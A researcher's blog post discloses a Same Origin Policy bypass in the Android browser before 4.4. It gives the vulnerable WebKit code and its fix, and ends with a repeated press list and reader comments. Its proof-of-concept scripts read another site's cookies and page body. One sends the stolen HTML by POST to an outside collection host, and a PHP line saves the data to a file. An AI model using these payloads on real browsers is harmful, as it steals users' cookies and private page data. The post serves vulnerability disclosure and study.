A Tale Of Another SOP Bypass In Android Browser < 4.4
Since, my recent android SOP bypass [CVE-2014-6041] triggered a lot of eruption among the infosec community, I was motivated to research a bit more upon the android browser, it turns out that things are much worse than I thought, I managed to trigger quite a few interesting vulnerabilities inside of Android browser, one of them being another Same Origin Policy Bypass vulnerability. The thing that makes it worse was the same SOP bypass was already fixed inside of chrome years ago, however the patches were not applied to Android browser < 4.4.
Proof Of Concept
The following is the proof of concept:<script>
window.onload = function()
{
object = document.createElement("object");
object.setAttribute("data", "http://www.bing.com");
document.body.appendChild(object);
object.onload = function() {
object.setAttribute("data", "javascript:alert(document.domain)");
object.innerHTML = "foobar";
}
}
</script>
The POC is very easy to understand for individuals having some javaScript background. However, for others let me break it down for you. The above code creates an object with data attribute, which loads up a URL from another origin in this case "http://www.bing.com", however once it's loaded, we replace bing.com with "javascript:alert(document.domain)". The interesting thing here is that the last line is essential for the POC to work object.innerHTML = "foobar"; so that the navigation request is performed
Let's take a look at the vulnerable code that is responsible for the causing the issue:
Vulnerable Code
bool HTMLPlugInImageElement::allowedToLoadFrameURL(const String& url){
ASSERT(document());
ASSERT(document()->frame());
if (document()->frame()->page()->frameCount() >= Page::maxNumberOfFrames)
return false;
KURL completeURL = document()->completeURL(url);
The above function is responsible for loading up the frame URL, if you take a close look at the code, you would find out that there is no validation for javascript scheme, which allows us to execute javaScript in context of the frame that was loaded.
The fix
The issue was fixed by applying the following checks from securityorigin.h library.if (contentFrame() && protocolIsJavaScript(completeURL)
&& !document()->securityOrigin()->canAccess(contentDocument()->securityOrigin()))
return false;
Proof Of Concept Using Postmessage Call
To help understand the vulnerability better and get to the root cause, i contacted Joe Vennix from metasploit team, who modified my original POC to the following to help demonstrate the vulnerability in an effective manner. The following POC uses postMessage call from HTML 5 world to send the document.cookie and innerHTML to the main window.<script>
window.onload = function()
{
object = document.createElement("object");
object.setAttribute("data", "http://www.bing.com");
document.body.appendChild(object);
object.onload = function() {
object.data = "javascript:var t=top;with(document)t.postMessage('HTML='+body.innerHTML+'&COOKIE='+cookie,'*');";
object.innerHTML = "foobar";
}
}
window.onmessage = function(m){
alert(m.data);
}
</script>
Proof Of Concept To Steal Data Across Domains
A great friend of mine @filedescriptor helped me with the following POC, which steals data from bing.com by accessing the document.body.innerHTML property as submits that data cross origin by using a POST request, since you can send limited amount of data with GET due to browser restrictions.<script>
window.onload = function()
{
object = document.createElement("object");
object.setAttribute("data", "http://www.bing.com");
document.body.appendChild(object);
object.onload = function() {
object.data = "javascript:with(document)body.innerHTML+='<form method=post action=//kcal.pw/record.php?name=__target=_><input name=content></form><iframe name=_>',__.content.value=body.innerHTML,__.submit()";
object.innerHTML = "foobar";
}
}
The PHP file hosted at record.php contains the following line, which saves the data coming from bing.com to a file called record.txt.
file_put_contents('record.txt', $_POST['content']);
The following are some of the handsets that we used to test and verify this vulnerability.
Sony Xperia
LGNexus4
Samsung Galaxy S3
Safari Browser 5.0
Google's Response
The vulnerability was responsibly disclosed to Google on 9/25/2014, The vulnerability was fixed on 10/1/2014 and the patches have been released here.In Closing
There are tons of other browsers with huge userbase that are vulnerable to same vulnerability, Maxthon, CM Browser, Safari Browser 5.0 to name a few. In case if you are still using Android browser or any of other browser, you should immediately apply patches or switch to Chrome or firefox. I believe there are several other vulnerabilities that were addresses in chrome webkit and still have not been addressed inside of Android browser, therefore it is recommended to avoid it completely.
Press Coverage
http://news.yahoo.com/half-android-phones-still-vulnerable-massive-privacy-bug-135551464.html
http://www.redmondpie.com/massive-privacy-bug-affects-many-android-devices-heres-how-to-protect-yourself/
http://threatpost.com/second-same-origin-policy-bypass-flaw-haunts-android-browser
http://www.securityweek.com/google-patches-second-same-origin-policy-bypass-flaw-android-browser
http://www.pcworld.com/article/2823012/almost-half-of-android-devices-still-have-a-vulnerable-browser-installed.html
http://www.csoonline.com/article/2690910/application-security/android-browser-flaw-found-to-leak-data.html
http://tribune.com.pk/story/771546/on-a-roll-another-bug-exposed-by-pakistani-researcher/
https://blog.lookout.com/blog/2014/10/06/aosp-browser-vuln/
http://www.net-security.org/secworld.php?id=17459
http://www.zdnet.com/half-of-all-android-devices-still-vulnerable-to-privacy-disaster-browser-bug-7000034500/
http://www.cio.com.au/article/556967/almost-half-android-devices-still-vulnerable-browser-installed/?fp=16&fpid=1
http://www.computerworld.com/article/2822813/45-of-android-devices-still-have-a-vulnerable-browser-installed.html#tk.rss_all
http://tribune.com.pk/story/776018/bugged-half-of-android-users-vulnerable-to-privacy-disaster/
http://checkmarx.com/2014/10/21/pakistani-ethical-hacker/
Press Coverage
http://news.yahoo.com/half-android-phones-still-vulnerable-massive-privacy-bug-135551464.html
http://www.redmondpie.com/massive-privacy-bug-affects-many-android-devices-heres-how-to-protect-yourself/
http://threatpost.com/second-same-origin-policy-bypass-flaw-haunts-android-browser
http://www.securityweek.com/google-patches-second-same-origin-policy-bypass-flaw-android-browser
http://www.pcworld.com/article/2823012/almost-half-of-android-devices-still-have-a-vulnerable-browser-installed.html
http://www.csoonline.com/article/2690910/application-security/android-browser-flaw-found-to-leak-data.html
http://tribune.com.pk/story/771546/on-a-roll-another-bug-exposed-by-pakistani-researcher/
https://blog.lookout.com/blog/2014/10/06/aosp-browser-vuln/
http://www.net-security.org/secworld.php?id=17459
http://www.zdnet.com/half-of-all-android-devices-still-vulnerable-to-privacy-disaster-browser-bug-7000034500/
http://www.cio.com.au/article/556967/almost-half-android-devices-still-vulnerable-browser-installed/?fp=16&fpid=1
http://www.computerworld.com/article/2822813/45-of-android-devices-still-have-a-vulnerable-browser-installed.html#tk.rss_all
http://tribune.com.pk/story/776018/bugged-half-of-android-users-vulnerable-to-privacy-disaster/
http://checkmarx.com/2014/10/21/pakistani-ethical-hacker/
ReplyDeleteVery Nice Great work such genius Pakistani
Nice one! Congrats Rafay!
ReplyDeleteMay I ask why is object.innerHTML = "foobar" essential for the POC to work ?
Why is CHANGING the content of the page essential for the first POC? How does this help us? Or is does more than just changing the content?
?
Delete